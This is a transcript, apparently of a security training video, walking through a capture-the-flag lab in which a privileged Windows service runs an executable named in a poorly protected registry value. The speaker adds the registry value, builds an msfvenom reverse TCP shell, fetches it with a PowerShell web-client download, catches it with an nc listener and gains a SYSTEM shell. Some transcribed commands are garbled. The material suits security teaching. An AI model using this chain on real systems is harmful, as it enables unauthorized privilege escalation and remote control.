Okay, we are back. So let's take a look at the last function call inside of vulnerable service in the task runner that we saw. So that last call is run registry command. So let's take a look at it here. So what it's doing is it looks like it's declaring a string of HKey local machine software vulnerable service. And then inside of that, it's looking for a value called cleanup script location. So it's calling get value right on there on cleanup script location. And then it's saying if the file exists here, so if there's something in this value, so it's getting this value for cleanup script location, and then checking to see if a file exists at that path, then if that exists and C DevTools cleanup solved does not exist, then it's going to generate a flag called cleanup solved, write it out to here, and then it's going to call process.start on here. So, okay, same kind of thing that we had with the helper executable, but a little bit different path, right? So it's looking in the registry. So if this registry entry is poorly protected, which spoiler alert, it is, if this registry entry is poorly protected, then we can hijack this or create a key if it doesn't exist, or hijack whatever the key is that's there, get it to go to our malicious executable, and then get execution. So all these things I'm talking about should be very familiar to us. These are things that happen, again, things that I have found in our applications and in our partner applications. Okay, so we're going to go back here. So now we're going to go to cd dev tools, cd c:\dev tools, inside of here. So we've got the backup and the helper. So now let's go cd hkey local machine. And then we're going to go to get child items here, cd software, get child items here. Let's see, and vulnerable service does exist. So cd vulnerable service. And then let's take a look here, get child items. Okay, there's no sub-registry entries for that. Now I'm going to have to Google this, so let's Google along together. So PowerShell create registry key. I think that'll get us on the right path. So we need to find a way to create a new registry key. So new item property seems like it's where we want to be, right? So new item property. Okay, so new item property, path is there, name is that, values that, and then check it again. So let's do this first. Let's get item property, make sure there's nothing there. So get item property. And we want to do the full path to it, right? So that's going to be, let's see if we need quotes. Let's go back here. Yep, we do. So get item property, HKey local machine, and then software, and then vulnerable service. And there's nothing there. Okay, so then what it looks like we can do is we can do new item property, new item property, and then it looks like it takes path, and the path is HKey local machine, software, vulnerable service, and then it's going to be, yep, so that's vulnerable service, and then the name of that is going to be cleanup script location, I believe. Let's double check. Cleanup script location, so that's the name of the key that we need to create. So let's go ahead and create that key called cleanup script location, and then I believe it's value. Let's go look at our document again. Name, value, so then we set our value. Let's set the value to, oh, it did not, oh, missing property. I accidentally hit enter, so that's okay. Let's paste that back in, and we're going to call this value is going to be c:\dev tools. Let's call it cleanup, cleanup.exe, right? And it looks like it created, so let's go back and try to take a look at it again. So get item property. And now, hey, look at this. We have an item property here. Cleanup script location. Hopefully we spelled that all right. And it's c::devtools cleanup.exe. So now what we should be able to do is we should be able to create something called cleanup.exe. So we do msf venom -p payload windows. And then we want this to be a shell and reverse. TCP, and then our L host, that's us, is 192.168.052, and then our L port is going to be 443. The format is going to be an executable, and then we're going to call it cleanup .exe. Cleanup.exe. Okay, so then we're going to set up our web server again. Sudo python3 -m http.server on port 80. And I think I typoed my password. Yep. There we go. So that's serving up. And then L port 443. Okay, so we missed an equals there. So L port equals 443. So let's let that go again. And while we're waiting for that, let's go ahead and set up our listeners. So sudo rlrep nc tech lvnp 443. So we've got our listener here, we've got our web server serving up the exploit. So now we want to cd:/dev tools. Look in here, and we're going to do IEX for invoke expression. We're going to do new object net.web client.download file. We're going to get HTTP 192.168.052. We want cleanup.exe. And then we are going to save that to c:/dev tools cleanup.exe. Now, if everything goes according to plan, we'll download this cleanup. It'll check the registry key and say, where's my cleanup executable? Grab the value out of the registry key, run our malicious payload, give us a shell back. So let's go. And immediately we get our shell back. So we can see our connection coming in from 192.168.047 on that ephemeral port. Who am I? I am NT Authority System. What's the host name? Host name. The host name is devctf. So we have achieved privilege escalation by going through and saying, okay, this is looking into the registry, deciding what to run, and it's running it from this location. So if there's a poorly secured registry key with permissions to everybody, they can use that. If it's specifying any executable location that a privileged service is calling, they can use it to elevate their privileges all the way up to the NT Authority system user. And so now let's take a look back here, and now we see cleanup solved. So let's get content of cleanup solved.txt, and there it is. So now we want to sudo v cleanup flag, put in our password, and then we'll get our flag here, and there's our flag. So what we've done is we've gone through, we reverse engineered it, we found all the calls that it's making, we found the bad encryption keys that were there, right? So we found the vulnerabilities there. So next time we're going to see if there's, we're going to look for more vulnerabilities, see if there's any in the service. And then if there's not, we're going to start talking about, okay, now that I've compromised this box, I've elevated my privileges up, I'm going to show you a little bit different tools. We're going to talk about how can I dump passwords. I'm going to talk about now what do I do that I've elevated my privileges all the way up. What are some of the malicious things that I can do, right? I'm not going to go into antivirus evasion. I'm not going to teach you guys antivirus evasion. So we'll just get into that next time. See you then.